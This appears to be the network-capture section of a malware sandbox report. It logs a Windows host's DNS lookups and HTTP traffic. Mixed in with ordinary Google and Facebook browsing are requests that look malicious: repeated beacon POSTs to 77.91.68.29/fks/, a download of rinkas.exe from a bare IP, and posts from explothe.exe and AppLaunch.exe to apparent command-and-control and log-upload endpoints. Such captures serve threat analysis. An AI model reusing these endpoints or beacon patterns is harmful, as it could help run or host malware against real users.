https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVheNjRAygS-m1hLkQGhWLI-_B9gWyk542KxR1CSY4sSKMl-9PnOfB_LRCNOR0C7DTsSR5VGjkQ&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1460296733%3A1697016307851706&theme=glif

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVheNjRAygS-m1hLkQGhWLI-_B9gWyk542KxR1CSY4sSKMl-9PnOfB_LRCNOR0C7DTsSR5VGjkQ&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1460296733%3A1697016307851706&theme=glif HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:RBTJBksj2HNA0mj0jMvNq9fmp1AI3w:pVn4zU_e4YwlWEB1
GET

https://accounts.google.com/

msedge.exe

Remote address:

142.250.179.141:443

Request

GET / HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:RBTJBksj2HNA0mj0jMvNq9fmp1AI3w:pVn4zU_e4YwlWEB1
cookie: NID=511=ZtI-c1WeyHlsx_krL8nqfPCzzntHaMkvLA_P4sP5Ziy6ERpu82ikkhdf2kghcoXxCTEMLYOiTul7bKGjmxix53OMy_70m_HP3WpgYx5nrIHfh7dilNxVVvYCRRr4RyZLiei_omQYcu5hM8puRt4r0Faegb6FhGhYB-yNUn-tEj4
POST

https://accounts.google.com/v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=8592231658167204169&bl=boq_identityfrontendauthuiserver_20231001.08_p0&hl=en-US&_reqid=33944&rt=c

msedge.exe

Remote address:

142.250.179.141:443

Request

POST /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=8592231658167204169&bl=boq_identityfrontendauthuiserver_20231001.08_p0&hl=en-US&_reqid=33944&rt=c HTTP/2.0
host: accounts.google.com
content-length: 165
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
x-goog-ext-278367001-jspb: ["GlifWebSignIn"]
x-same-domain: 1
x-goog-ext-391502476-jspb: ["S1460296733:1697016307851706",null,null,"AYZoVheNjRAygS-m1hLkQGhWLI-_B9gWyk542KxR1CSY4sSKMl-9PnOfB_LRCNOR0C7DTsSR5VGjkQ"]
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded;charset=UTF-8
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://accounts.google.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: NID=511=ZtI-c1WeyHlsx_krL8nqfPCzzntHaMkvLA_P4sP5Ziy6ERpu82ikkhdf2kghcoXxCTEMLYOiTul7bKGjmxix53OMy_70m_HP3WpgYx5nrIHfh7dilNxVVvYCRRr4RyZLiei_omQYcu5hM8puRt4r0Faegb6FhGhYB-yNUn-tEj4
cookie: __Host-GAPS=1:Hmqv8pwgBuyqZVwF10LX1IKTyde7zg:GD4Qi7Me-TLe3XLy
GET

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: NID=511=ZtI-c1WeyHlsx_krL8nqfPCzzntHaMkvLA_P4sP5Ziy6ERpu82ikkhdf2kghcoXxCTEMLYOiTul7bKGjmxix53OMy_70m_HP3WpgYx5nrIHfh7dilNxVVvYCRRr4RyZLiei_omQYcu5hM8puRt4r0Faegb6FhGhYB-yNUn-tEj4
cookie: __Host-GAPS=1:p0Gcwbhlkk3XoJKEkIXsRJ9K3jGXVg:ZtPffSCcY2hHqtcv
GET

https://accounts.google.com/_/bscframe

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /_/bscframe HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: NID=511=ZtI-c1WeyHlsx_krL8nqfPCzzntHaMkvLA_P4sP5Ziy6ERpu82ikkhdf2kghcoXxCTEMLYOiTul7bKGjmxix53OMy_70m_HP3WpgYx5nrIHfh7dilNxVVvYCRRr4RyZLiei_omQYcu5hM8puRt4r0Faegb6FhGhYB-yNUn-tEj4
cookie: __Host-GAPS=1:p0Gcwbhlkk3XoJKEkIXsRJ9K3jGXVg:ZtPffSCcY2hHqtcv
GET

https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhdnn69lGdvTg3STPGL8dzCvaw_K7colJE-BRPdkb9PgdZ1PVjMfxR1NeafUtp2j1JUF8l0B4A

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhdnn69lGdvTg3STPGL8dzCvaw_K7colJE-BRPdkb9PgdZ1PVjMfxR1NeafUtp2j1JUF8l0B4A HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: NID=511=ZtI-c1WeyHlsx_krL8nqfPCzzntHaMkvLA_P4sP5Ziy6ERpu82ikkhdf2kghcoXxCTEMLYOiTul7bKGjmxix53OMy_70m_HP3WpgYx5nrIHfh7dilNxVVvYCRRr4RyZLiei_omQYcu5hM8puRt4r0Faegb6FhGhYB-yNUn-tEj4
cookie: __Host-GAPS=1:jFWVLn3wvV3_XnI8p_sw7ddALduHqA:n1I6rfwWmuOyG6EG
GET

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhdVmI8yzHXTlbFjMZ-K4RAcCKVWlLFMN5vVZjo1TnAbR6MMjt4vwW4KKEmB6r4PHPIrIE-38Q&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1626813541%3A1697016346600453&theme=glif

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhdVmI8yzHXTlbFjMZ-K4RAcCKVWlLFMN5vVZjo1TnAbR6MMjt4vwW4KKEmB6r4PHPIrIE-38Q&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1626813541%3A1697016346600453&theme=glif HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: NID=511=ZtI-c1WeyHlsx_krL8nqfPCzzntHaMkvLA_P4sP5Ziy6ERpu82ikkhdf2kghcoXxCTEMLYOiTul7bKGjmxix53OMy_70m_HP3WpgYx5nrIHfh7dilNxVVvYCRRr4RyZLiei_omQYcu5hM8puRt4r0Faegb6FhGhYB-yNUn-tEj4
cookie: __Host-GAPS=1:jFWVLn3wvV3_XnI8p_sw7ddALduHqA:n1I6rfwWmuOyG6EG
DNS

141.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.179.250.142.in-addr.arpa

IN PTR

Response

141.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f131e100net
DNS

35.201.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.201.240.157.in-addr.arpa

IN PTR

Response

35.201.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ams4facebookcom
DNS

195.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.179.250.142.in-addr.arpa

IN PTR

Response

195.179.250.142.in-addr.arpa

IN PTR

ams15s42-in-f31e100net
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
DNS

131.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.179.250.142.in-addr.arpa

IN PTR

Response

131.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f31e100net
DNS

static.xx.fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A

Response

static.xx.fbcdn.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

157.240.231.1
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fqruna.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 158
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 09:25:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mfjoqlkycb.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 131
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 09:25:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ldvhscmk.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 343
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 09:25:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dxrkvceg.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 265
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 09:25:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cvvoa.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 311
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 09:25:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qcbxtobree.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 132
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 09:25:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://namqlsljsy.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 181
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 09:25:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kkjwelgibh.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 322
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 09:25:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yscbcj.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 156
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 09:25:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hhmstxskkr.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 121
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 09:25:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://okegtmxjm.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 292
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 09:25:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://muirovec.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 280
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 09:25:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qvymx.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 252
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 09:25:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rodsd.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 202
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 09:25:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 40
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

1.231.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.231.240.157.in-addr.arpa

IN PTR

Response

1.231.240.157.in-addr.arpa

IN PTR

xx-fbcdn-shv-01-fco2fbcdnnet
DNS

facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

facebook.com

IN A

Response

facebook.com

IN A

157.240.231.35
DNS

fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

fbcdn.net

IN A

Response

fbcdn.net

IN A

157.240.231.35
DNS

35.231.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.231.240.157.in-addr.arpa

IN PTR

Response

35.231.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-fco2facebookcom
DNS

fbsbx.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A

Response

fbsbx.com

IN A

157.240.231.35
GET

http://5.42.65.80/rinkas.exe

Remote address:

5.42.65.80:80

Request

GET /rinkas.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 11 Oct 2023 09:25:38 GMT
Content-Type: application/octet-stream
Content-Length: 15877632
Last-Modified: Tue, 10 Oct 2023 16:08:19 GMT
Connection: keep-alive
ETag: "652576f3-f24600"
Accept-Ranges: bytes
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
POST

http://77.91.124.1/theme/index.php

explothe.exe

Remote address:

77.91.124.1:80

Request

POST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 09:25:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
DNS

1.124.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.124.91.77.in-addr.arpa

IN PTR

Response

1.124.91.77.in-addr.arpa

IN PTR
DNS

play.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.251.36.14
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

msedge.exe

Remote address:

142.251.36.14:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
POST

http://5.42.92.211/loghub/master

AppLaunch.exe

Remote address:

5.42.92.211:80

Request

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=jt6smOxVRtZJZOUUMTPM
Content-Length: 209
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 5.42.92.211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 11 Oct 2023 09:25:44 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
DNS

14.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.36.251.142.in-addr.arpa

IN PTR

Response

14.36.251.142.in-addr.arpa

IN PTR

ams15s44-in-f141e100net
DNS

211.92.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.92.42.5.in-addr.arpa

IN PTR

Response

211.92.42.5.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

11.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.173.189.20.in-addr.arpa

IN PTR

Response

204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.6kB
8.3kB
17
14
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301269_1SV32GTE1U6J5ZYXG&pid=21.2&w=1920&h=1080&c=4

tls, http2

116.7kB
3.1MB
2296
2291

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301250_1MLG2SHGO160JKUMX&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301678_17ZTGMBOXP9GMFDLK&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301659_1X4L46L6ILPPQI95F&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317300965_1DQ2FNZEHERI9UUJI&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301398_1SI4JLH5HQE0ZMCJV&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301269_1SV32GTE1U6J5ZYXG&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
142.250.179.141:443

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhdVmI8yzHXTlbFjMZ-K4RAcCKVWlLFMN5vVZjo1TnAbR6MMjt4vwW4KKEmB6r4PHPIrIE-38Q&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1626813541%3A1697016346600453&theme=glif

tls, http2

msedge.exe

11.3kB
251.6kB
153
241

HTTP Request

GET https://accounts.google.com/

HTTP Request

GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

HTTP Request

GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhetRvTZVDNhN73tA4xp3HSjZ59LcyT_f5hknamM9G2yywQdoXqZ97nGj9VnG6XaHRSuDDR2SA

HTTP Request

